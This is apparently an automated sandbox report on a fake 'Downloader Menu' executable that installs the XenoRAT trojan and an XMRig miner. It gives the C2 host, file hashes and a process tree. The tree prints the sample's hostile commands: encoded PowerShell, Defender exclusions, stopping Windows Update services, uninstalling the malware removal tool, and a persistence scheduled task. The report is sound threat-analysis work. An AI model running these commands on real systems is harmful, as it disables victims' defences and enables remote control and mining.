Overview

overview

10

Static

static

3

Downlaoder_Menu.exe

windows7-x64

10

Downlaoder_Menu.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-05-2024 13:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Downlaoder_Menu.exe

  • Size

    4.5MB

  • MD5

    ec79983fdb605310fac832ba5809e2d6

  • SHA1

    ca83d6453563e02decf614d0ce331de493267d2f

  • SHA256

    b67d8fc52334fb2309368bf2a738520f1b42436951b211b7896f612b86350c10

  • SHA512

    234bb8696c8a6929784165366dc4317d5826738711a7661bf26e4ffab8e958db23d0f2a11542b3f0b5c4c71d62d3e4bc7a730d94d917a21d132d40e2a67ed460

  • SSDEEP

    98304:ePj50PrsilC2IbhblAh5+dWspirADIsYAVjw1gI:i5gahZWs80sfsw1R

Score
10/10
xenoratxmrigevasionexecutionminerrattrojanupx

Malware Config

Extracted

Family

xenorat

C2

hax.onthewifi.com

Mutex

hAxxx

Attributes
  • delay

    5000

  • install_path

    appdata

  • port

    1960

  • startup_name

    Windows

Signatures

  • XenorRat

    XenorRat is a remote access trojan written in C#.

    trojanratxenorat
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 11 IoCs
    miner
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 4 IoCs
  • UPX packed file 16 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Downlaoder_Menu.exe
    "C:\Users\Admin\AppData\Local\Temp\Downlaoder_Menu.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1652
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZgBiACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGgAcwBjACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVwBpAG4AZABvAHcAcwAgAGkAbgBzAHQAYQBsAGwAYQB0AGkAbwBuACAAZQBuAGMAbwB1AG4AdABlAHIAZQBkACAAYQBuACAAdQBuAGUAeABwAGUAYwB0AGUAZAAgAGUAcgByAG8AcgAuACAAVgBlAHIAaQBmAHkAIAB0AGgAYQB0ACAAdABoAGUAIABpAG4AcwB0AGEAbABsAGEAdABpAG8AbgAgAHMAbwB1AHIAYwBlAHMAIABhAHIAZQAgAGEAYwBjAGUAcwBpAGIAbABlACwAIABhAG4AZAAgAHIAZQBzAHQAYQByAHQAIAB0AGgAZQAgAGkAbgBzAHQAYQBsAGwAYQB0AGkAbwBuAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHgAZABtACMAPgA="
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3184
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAawByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAcABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZgBnACMAPgA="
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3972
    • C:\Windows\Downloader_Menu_2.1.exe
      "C:\Windows\Downloader_Menu_2.1.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2564
      • C:\Users\Admin\cvtres.exe
        C:\Users\Admin\cvtres.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4536
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\temp_.ps1"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops startup file
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3620
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
            5⤵
            • Drops file in Drivers directory
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4708
            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3584
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3128
              • C:\Windows\system32\wusa.exe
                wusa /uninstall /kb:890830 /quiet /norestart
                7⤵
                  PID:3884
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop UsoSvc
                6⤵
                • Launches sc.exe
                PID:964
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop WaaSMedicSvc
                6⤵
                • Launches sc.exe
                PID:1728
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop wuauserv
                6⤵
                • Launches sc.exe
                PID:2584
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop bits
                6⤵
                • Launches sc.exe
                PID:4308
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop dosvc
                6⤵
                • Launches sc.exe
                PID:3020
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1976
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1496
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3156
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2340
              • C:\Windows\explorer.exe
                explorer.exe
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5076
      • C:\Users\Admin\AppData\Roaming\risk.exe
        "C:\Users\Admin\AppData\Roaming\risk.exe"
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1012
        • C:\Users\Admin\AppData\Roaming\XenoManager\risk.exe
          "C:\Users\Admin\AppData\Roaming\XenoManager\risk.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3796
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks.exe" /Create /TN "Windows" /XML "C:\Users\Admin\AppData\Local\Temp\tmp541B.tmp" /F
            4⤵
            • Creates scheduled task(s)
            PID:1908

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      50f1cbc27816c3383e75c81819c52eba

      SHA1

      af1e75ca420d5f7338802e42016762a215c89321

      SHA256

      10422c1baedfb15ace78d300754ac7803dff07278a84cedc609371661cdad6a2

      SHA512

      f59fd9d48dacf9114ed1dc42f31dc483e90f6020c6aee941da672719f2656b46ec8a454455176db9288a7fcdeb6d11178d548ea0ec421d2ca55aa4a22fc64054

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      968cb9309758126772781b83adb8a28f

      SHA1

      8da30e71accf186b2ba11da1797cf67f8f78b47c

      SHA256

      92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

      SHA512

      4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      9a6fe311e662e223ef8c4ccc6b6d6583

      SHA1

      8d4e33bfedc9e5bc19823ea499352bd92515dd9d

      SHA256

      b7b2504e05c04b3da11cabb4f4b13e28e924dcfa506c874e936998f71a7181fd

      SHA512

      fe90f0f8b1c7a51e24158463a53b8ab71eb97a6d0510e43bb61964b077c5a801a1ed62eed3d3f4b3a1b780d7a336291b9402e9657ee58759c6a68622eacbaee7

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      17KB

      MD5

      18942297c4143f83b7b882afdbc13184

      SHA1

      05172cdd2661c3b71a10a1c5a32a2a371943f3e5

      SHA256

      c007572c9cac9b3b2a9b0bfda00dc5728af685db7ce2d4b74ccae6fea56498cc

      SHA512

      332800bba09c611b9d6954e5b4b7173d32aff313463d22ca26323b4bb49a6646a97de1ce0c7403a2d5f75bbced73755d6da5cc6c1f39da9eacbd5d98ac672b57

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ttd3m3h4.5py.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\tmp541B.tmp
      Filesize

      1KB

      MD5

      c824a7486b8af655d347fd367022d0d2

      SHA1

      17bb7f077818e6d5ecb3be0fc681d341b82dd72b

      SHA256

      025ef7965c1b7643ff8d71a48c71d62ce4380e3ac6324ecf51f80717a4d61c14

      SHA512

      a026982ac700263bf2dfd5415365dbe52b0e59095adfd00c937af28f5c84978faf65aeb2cd2c7c9dc5c7b38dc82dc2acc2d7b91e96026e73a881483168586bc1

      Download Submit
    • C:\Users\Admin\AppData\Roaming\risk.exe
      Filesize

      45KB

      MD5

      2cb05f0d4360327b33956fedf516c6fe

      SHA1

      4562653b1361ce66ded9633e5883d00184c08796

      SHA256

      af82f7a1ca358d54f5da73409d05360c265f7569fb768218051c7ef2620e66e6

      SHA512

      f0967245d1693d74d146356c9540a9ae0b848a96a6e58eacc111a951a6b32e01f325f8848b2b0c66b38dbfcdcb37e052ccfc27cf9b3b6752f3cba876181f6fa6

      Download Submit
    • C:\Users\Admin\cvtres.exe
      Filesize

      5KB

      MD5

      c9698a20e68954387eed40d36d17c087

      SHA1

      c50cf0ac1cbf51a89b6c1b816e5e63e7e7287179

      SHA256

      3a71a978827979baeec7b94607e93a72cf2a51a7204a572f68a3788d83b87d8f

      SHA512

      f8099e4e6bf6e1cd850faa398b3ef8862852342bef0ec8a7318495be6e82ddf903834b951faa6c5bbd0879414dcaccf3fec6ade4ef74054e08011d718ed1e813

      Download Submit
    • C:\Users\Admin\temp.bat
      Filesize

      5.4MB

      MD5

      96b7afe999094957a1ce5b1c0ee0cb2f

      SHA1

      6b5d48b5f75246993de0263d27d2b9cdcc6ebf3f

      SHA256

      d22cb88bfae5285d86cb35c2acba863f85b2e63c241c1959d15ca3416bcb5e4a

      SHA512

      ed7e02b26664b442f95fdf83af03d7773c017dadf3bec8c2d37cc2b30c49b6751a3104b85f00cfedbd145f422635e5b3ad49ea80adf7c0a92b06db474c6a238c

      Download Submit
    • C:\Users\Admin\temp.ps1
      Filesize

      1KB

      MD5

      5e817bbd9ef2f8821aa0283b20a51923

      SHA1

      102ca518d89653fb400636e660fa3fc276235c5c

      SHA256

      27f2822ca2be992ebb6e1000aa3a2c39e9b4ff7e257cb45eadda8776d65018a7

      SHA512

      f21388e0655e6733abc70ff9fe2bbfdca00d81d2e7a09236d679293df34a966990f689f2d62119cdd877c7aeda35ab0c2b3c66108bc6b721e5dea34a93342d2e

      Download Submit
    • C:\Users\Admin\temp_.bat
      Filesize

      5.4MB

      MD5

      ff46d6b0970c55dba491b6dd06384f84

      SHA1

      c8be08575f2174a9a00bff33e3b1a7c1d9c4a025

      SHA256

      a5ad5faab69350449e8fd14adcb262ecb289696d5f0da374891e9eb226824c85

      SHA512

      b0d5b4eb5d9b58f35f218dffb43956716adb062626a75fcde11ba517e9d16d015f8a0d90ae72fbad47c87cbec86ef3e6a16347900f0c0be97e47f6d58bdac3a6

      Download Submit
    • C:\Users\Admin\temp_.ps1
      Filesize

      1KB

      MD5

      5a0a8376c0e45cc25d4050920cee3dcc

      SHA1

      2de4ddf90f3165b245bd9f77c145c8f770c98b85

      SHA256

      86af1b7845145745ccaf65bf0dbeb1a981701ad0c6793c2dc93c0c2f2aef8d25

      SHA512

      f5afd39336d6b9f0590d68a716e8c3b403c13b98aae34d76f43e34698d2c6485e3dbce7a6439623362effec50ab0b2696b1ed25e377ba4dae75047ef419f51c0

      Download Submit
    • C:\Windows\Downloader_Menu_2.1.exe
      Filesize

      4.4MB

      MD5

      9d3195f106a540570da0d038bc07cf68

      SHA1

      33c1dd7a4101d1622b4d9268da0b731e00ddca39

      SHA256

      240b3b43f49f5430d9d2e263e857d6e4c9c98af09fe8ae7d9c0e6b7c9eeacfce

      SHA512

      9c7b0da3e2a01a05f61e39648d31851c5b0d70d7f20d865792cf4c8cec39ad764b2f11833116dbcdea57f3ec1785345921defbd656eab4fc23095b63ba889f69

      Download Submit
    • memory/1012-22-0x0000000000A20000-0x0000000000A32000-memory.dmp
      Filesize

      72KB

      Download
    • memory/3184-39-0x0000000005710000-0x0000000005776000-memory.dmp
      Filesize

      408KB

      Download
    • memory/3184-78-0x0000000006230000-0x000000000624A000-memory.dmp
      Filesize

      104KB

      Download
    • memory/3184-77-0x00000000073B0000-0x0000000007A2A000-memory.dmp
      Filesize

      6.5MB

      Download
    • memory/3184-80-0x0000000007FE0000-0x0000000008584000-memory.dmp
      Filesize

      5.6MB

      Download
    • memory/3184-81-0x0000000006F30000-0x0000000006FC2000-memory.dmp
      Filesize

      584KB

      Download
    • memory/3184-45-0x0000000005780000-0x0000000005AD4000-memory.dmp
      Filesize

      3.3MB

      Download
    • memory/3184-37-0x00000000056A0000-0x0000000005706000-memory.dmp
      Filesize

      408KB

      Download
    • memory/3620-108-0x0000012D63820000-0x0000012D63842000-memory.dmp
      Filesize

      136KB

      Download
    • memory/3620-116-0x0000012D00040000-0x0000012D00570000-memory.dmp
      Filesize

      5.2MB

      Download
    • memory/3620-117-0x0000012D7CAC0000-0x0000012D7CB36000-memory.dmp
      Filesize

      472KB

      Download
    • memory/3620-118-0x0000012D635F0000-0x0000012D6360E000-memory.dmp
      Filesize

      120KB

      Download
    • memory/3620-120-0x0000012D00C20000-0x0000012D00C26000-memory.dmp
      Filesize

      24KB

      Download
    • memory/3972-92-0x0000000007760000-0x000000000777A000-memory.dmp
      Filesize

      104KB

      Download
    • memory/3972-24-0x0000000005370000-0x0000000005998000-memory.dmp
      Filesize

      6.2MB

      Download
    • memory/3972-91-0x0000000007680000-0x0000000007694000-memory.dmp
      Filesize

      80KB

      Download
    • memory/3972-23-0x0000000002B20000-0x0000000002B56000-memory.dmp
      Filesize

      216KB

      Download
    • memory/3972-93-0x00000000076B0000-0x00000000076B8000-memory.dmp
      Filesize

      32KB

      Download
    • memory/3972-83-0x0000000007630000-0x0000000007641000-memory.dmp
      Filesize

      68KB

      Download
    • memory/3972-82-0x00000000076C0000-0x0000000007756000-memory.dmp
      Filesize

      600KB

      Download
    • memory/3972-79-0x00000000074A0000-0x00000000074AA000-memory.dmp
      Filesize

      40KB

      Download
    • memory/3972-76-0x00000000072E0000-0x0000000007383000-memory.dmp
      Filesize

      652KB

      Download
    • memory/3972-75-0x00000000066C0000-0x00000000066DE000-memory.dmp
      Filesize

      120KB

      Download
    • memory/3972-65-0x0000000074C60000-0x0000000074CAC000-memory.dmp
      Filesize

      304KB

      Download
    • memory/3972-64-0x00000000066E0000-0x0000000006712000-memory.dmp
      Filesize

      200KB

      Download
    • memory/3972-60-0x0000000006140000-0x000000000618C000-memory.dmp
      Filesize

      304KB

      Download
    • memory/3972-59-0x0000000006110000-0x000000000612E000-memory.dmp
      Filesize

      120KB

      Download
    • memory/3972-33-0x0000000005340000-0x0000000005362000-memory.dmp
      Filesize

      136KB

      Download
    • memory/3972-90-0x0000000007670000-0x000000000767E000-memory.dmp
      Filesize

      56KB

      Download
    • memory/4536-87-0x0000019A2D2D0000-0x0000019A2D2D8000-memory.dmp
      Filesize

      32KB

      Download
    • memory/4708-122-0x0000000140000000-0x0000000140508000-memory.dmp
      Filesize

      5.0MB

      Download
    • memory/4708-121-0x0000000140000000-0x0000000140508000-memory.dmp
      Filesize

      5.0MB

      Download
    • memory/5076-151-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/5076-148-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/5076-147-0x0000000000ED0000-0x0000000000EF0000-memory.dmp
      Filesize

      128KB

      Download
    • memory/5076-145-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/5076-144-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/5076-149-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/5076-152-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/5076-141-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/5076-150-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/5076-146-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/5076-143-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/5076-140-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/5076-142-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/5076-153-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/5076-155-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/5076-157-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download
    • memory/5076-156-0x0000000140000000-0x0000000140848000-memory.dmp
      Filesize

      8.3MB

      Download